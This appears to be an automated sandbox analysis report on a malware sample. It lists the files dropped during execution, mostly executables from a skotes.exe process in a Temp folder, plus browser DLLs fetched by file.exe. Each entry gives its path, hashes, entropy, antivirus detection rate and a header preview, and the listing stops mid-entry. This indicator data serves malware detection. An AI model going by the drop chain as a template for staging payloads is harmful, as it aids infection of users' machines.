                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................pM...........@...........................M.....^.....@.................................W...k.......H....................OM.............................`OM..................................................... . ............................@....rsrc...H...........................@....idata ............................@... ..+.........................@...hicendxx......2.....................@...qvwfrqsg.....`M.....................@....taggant.0...pM.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1806336
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.944886792748166
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:n+U/JBdKSFgDBdYxZwTmyVy+wXqw/5v6k7eWZy8SwHl:n+UxCIgB+IqAdw6al6kKWc8R
                                                                                                                                                                                                                                                                                      MD5:7A3B3989F1F3647DC9188A185B345D43
                                                                                                                                                                                                                                                                                      SHA1:475A5D5E48C0F25F8083FF7657E9D6958E39D2AD
                                                                                                                                                                                                                                                                                      SHA-256:749A24775A9225DD27ED9D457D9A82ACE5122CDCAAEF5069AE3E802464E2C77B
                                                                                                                                                                                                                                                                                      SHA-512:A0709CBFF8C8A4A55DE37BB2829C1B7922B96D5E74E71655D932A7BC355D6CCBEBA0CE84F89698439FF2E3831A671CEA427785D0F0024731BC04A6390A48AC8B
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g....................."........i...........@..........................0i.....:.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......b..................@....rsrc.........$......r..............@....idata ......$......t..............@... .@*...$......v..............@...riuyamyn......O......x..............@...ezwcdmtt......h......h..............@....taggant.0....i.."...n..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4387328
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.986793956939786
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:98304:qya3O/DHkwdl/y8cTN9fyocxA8NMCfMUdkiwD42XN:qya3O/1cTNRyvu2kiwDNX
                                                                                                                                                                                                                                                                                      MD5:E0DAF3617F84AF41981769A31ED23565
                                                                                                                                                                                                                                                                                      SHA1:E366C1340BA76460BBB29A86530BB855FBD2FFAA
                                                                                                                                                                                                                                                                                      SHA-256:3A312AE4537C6311D8D2A395F3CE7B1B7BA74280B84069C800CA9F81EFA23EEC
                                                                                                                                                                                                                                                                                      SHA-512:A33C985EFD651DCE9DCFCB84285485A01FA39C74EE593B1E68BE83EBF8B8B29A1E7807E7B54F691B0C9DB24BDDC15A5BC6D376DFC8CB8994C2E5B754639E4039
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<g...............(..I...s..2............J...@..................................C...@... ............................._.q.s...........................................................X....................................................... . ..p......x'.................@....rsrc ......p.......'.............@....idata ......q.......'.............@... ..8...q.......'.............@...rvygeofs.@.......>....'.............@...echvckmy..............B.............@....taggant.0......."....B.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\0cd122cb-bfaf-4536-91d5-c8e952ce8c1c.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4387328
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.986793956939786
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:98304:qya3O/DHkwdl/y8cTN9fyocxA8NMCfMUdkiwD42XN:qya3O/1cTNRyvu2kiwDNX
                                                                                                                                                                                                                                                                                      MD5:E0DAF3617F84AF41981769A31ED23565
                                                                                                                                                                                                                                                                                      SHA1:E366C1340BA76460BBB29A86530BB855FBD2FFAA
                                                                                                                                                                                                                                                                                      SHA-256:3A312AE4537C6311D8D2A395F3CE7B1B7BA74280B84069C800CA9F81EFA23EEC
                                                                                                                                                                                                                                                                                      SHA-512:A33C985EFD651DCE9DCFCB84285485A01FA39C74EE593B1E68BE83EBF8B8B29A1E7807E7B54F691B0C9DB24BDDC15A5BC6D376DFC8CB8994C2E5B754639E4039
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<g...............(..I...s..2............J...@..................................C...@... ............................._.q.s...........................................................X....................................................... . ..p......x'.................@....rsrc ......p.......'.............@....idata ......q.......'.............@... ..8...q.......'.............@...rvygeofs.@.......>....'.............@...echvckmy..............B.............@....taggant.0......."....B.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1858560
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.949317854505955
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:mDxCYkN3+dWzAhVYmVVorw7LGBHAStgfg5pN0Dl6g7nFH1ZsTRQLrE0hYOb/0P0S:j5N3YtTGGSG4C4g7bZ4mLrf0MFV6j
                                                                                                                                                                                                                                                                                      MD5:C295093AA18965205A72349F476A9CF3
                                                                                                                                                                                                                                                                                      SHA1:A6BE2ADB5B6CEC99D08774CC16F97A0958E725FD
                                                                                                                                                                                                                                                                                      SHA-256:E17A1DEA3206E9CD29BADCA66347857B796122E12ED6017F0889BF8E196DCFD8
                                                                                                                                                                                                                                                                                      SHA-512:697136DDF3E73F24AB10931481DE27972679996D98AD73DC5376637696E40FEBED34F9CEDA624725B5DA58E4F65F435F49DF2198B64C5502CD7CD0E1B16D02FD
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g..............................I...........@...........................J......:....@.................................\p..p............................q...................................................................................... . .P.......^..................@....rsrc .....`.......n..............@....idata .....p.......n..............@... ..*..........p..............@...hcvjgapr......0......r..............@...xbrvldyi......I......6..............@....taggant.0....I.."...:..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1806336
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.944886792748166
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:n+U/JBdKSFgDBdYxZwTmyVy+wXqw/5v6k7eWZy8SwHl:n+UxCIgB+IqAdw6al6kKWc8R
                                                                                                                                                                                                                                                                                      MD5:7A3B3989F1F3647DC9188A185B345D43
                                                                                                                                                                                                                                                                                      SHA1:475A5D5E48C0F25F8083FF7657E9D6958E39D2AD
                                                                                                                                                                                                                                                                                      SHA-256:749A24775A9225DD27ED9D457D9A82ACE5122CDCAAEF5069AE3E802464E2C77B
                                                                                                                                                                                                                                                                                      SHA-512:A0709CBFF8C8A4A55DE37BB2829C1B7922B96D5E74E71655D932A7BC355D6CCBEBA0CE84F89698439FF2E3831A671CEA427785D0F0024731BC04A6390A48AC8B
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g....................."........i...........@..........................0i.....:.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......b..................@....rsrc.........$......r..............@....idata ......$......t..............@... .@*...$......v..............@...riuyamyn......O......x..............@...ezwcdmtt......h......h..............@....taggant.0....i.."...n..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):922624
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.592765869528468
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:JqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgamTA:JqDEvCTbMWu7rQYlBQcBiT6rprG8a+A
                                                                                                                                                                                                                                                                                      MD5:68D659F5943261E1EF96EF4BF5EE50A0
                                                                                                                                                                                                                                                                                      SHA1:7503CCD4B8CAD67A68C335F3F6CF0EF0CCE84780
                                                                                                                                                                                                                                                                                      SHA-256:DBF65560EF727CD961E0E0144E3A945C7655DEBFE059CC5A84E4E5069EEECC80
                                                                                                                                                                                                                                                                                      SHA-512:AEAF6E7C4DE4416C3A481E9E58845482819BE63ED7462EF52C59FCA30AD8961F5CDF57D5A6419AFE8C836215E8D70C950DDB2A06DC82554C385DF2A53678118B
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...Z.=g.........."..........d......w.............@..........................p............@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2741248
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.529910099645019
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:XX5tH2SeYbQmfcXddDo5WxOSH52YdHq4u3VJBb3tVwonma+GPj/O6cTA3:XXXH2HYbQmf6ddDooxOSH1K4cb3gGP/1
                                                                                                                                                                                                                                                                                      MD5:17953500D9B941E5D42EA7121ADAADC8
                                                                                                                                                                                                                                                                                      SHA1:E98556A798DEEC4B705EDE2908316AA337658904
                                                                                                                                                                                                                                                                                      SHA-256:7C4CDF4FF736598C7C4611FEB1C4DE1E845B3FD4E8708DDBB652B967E6722DD3
                                                                                                                                                                                                                                                                                      SHA-512:7F35E7651E60A558F1C4C08C4AE086A786B6EA86B16BF8FBB61F07F59512B957598CE7D3E35EDD1AE39F53B79C886869E2D583B452A950A75E4AB8ADB7820BBD
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........@*.. ...`....@.. ........................*.......*...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...yggyennp..)......r)..:..............@...ceftresi. ... *.......).............@....taggant.@...@*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2e2a348a-2e3b-484f-92f5-12eda4b8766e.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\36a03294-0a55-423f-a560-2653e428270a.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):31335
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                      MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                      SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                      SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                      SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\600bd456-8698-4ad0-a4f3-6d44da00f379.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):108081
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.950655792295772
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:ytz/M7t0PaykTtvzz6YGqne1A6FpitwN/HZQWPqLvdy+NzovrRI5i7TCGpOxdLoe:Mz/M7t0yTtvedFphPgvYe8WMTzpOPoe
                                                                                                                                                                                                                                                                                      MD5:233B09A1BCB743EC3164E785F5702965
                                                                                                                                                                                                                                                                                      SHA1:6EF01E0066D94BA3F902566D9E750E7C426F7FD8
                                                                                                                                                                                                                                                                                      SHA-256:E183D33B5539A67C0A3371AA1DA09D86954B76D1EA31F8ADAFDA373988FA0CF1
                                                                                                                                                                                                                                                                                      SHA-512:A843458072B597E48A078C7E8AFCDB41E04BA6EF2090D0D04CE76B919AB3B8257E4BCC942AB7E460502CEC059588675F170B64A873531809033BBCBDD28251C6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR... ... .....szz.....bKGD............./IDATX..W}l.E..3..w.+..H.|...D.%..M.Z5.I..&.Q....W.%.P..!.&.Q.."..0...H.Z.".....>Z....A.......m.....1..........{...A........<.-a.27j..... '.A.D...kVI.B..A...}..o:/...h<..E....M2r.0.PP<j.j..e]..>lh.(..?u.....KqB.7CP..8.D.a.$.%..??.iG.=+.~..2FH...\am;}...n......h~.H...........#KvW..w;.#.dc..1.JW.2...(...nu.Q0....,..H0..1)..[....^.P..r..;.`{.d........%...6.......@.."O.+"&zSym.,.Nn..L..*pj.&K.Z.....yH=..R.P?.i..Td...Sb.%o.....w..R`.sOJIjQ*.>...i.v....A.CD|bfx....).o.g.....I....6...!....<.t*|"....PO*<".:/+..>1.......R.o...@.../"y.",S.@...B..h...Z...P.>.......+...:z........7,:.....|)C.p.H+`i..e).8...zA".$:Z.o.........j]].....K:.....ZI.. ....~.*.&........:]...*w.md./zkT.Z..F........,."7|.|u..3....G.../7.oJ...*...7..~l......PY.HQ>..`$........2.{.....>( I,...h..I...N.y}=..VN.R.....IH..kp.V..|Io.+k...Eb.ES>.E2......Z.._.I .q0..0.......F.&D.(D1.Q+.M...!z9.....#xV.p....nH....7....\t.w"`F...-

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\73bbc658-ae90-449d-b96f-213da6a4c0d1.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\DocumentsKJEGCFBGDH.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1957888
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.949115024240714
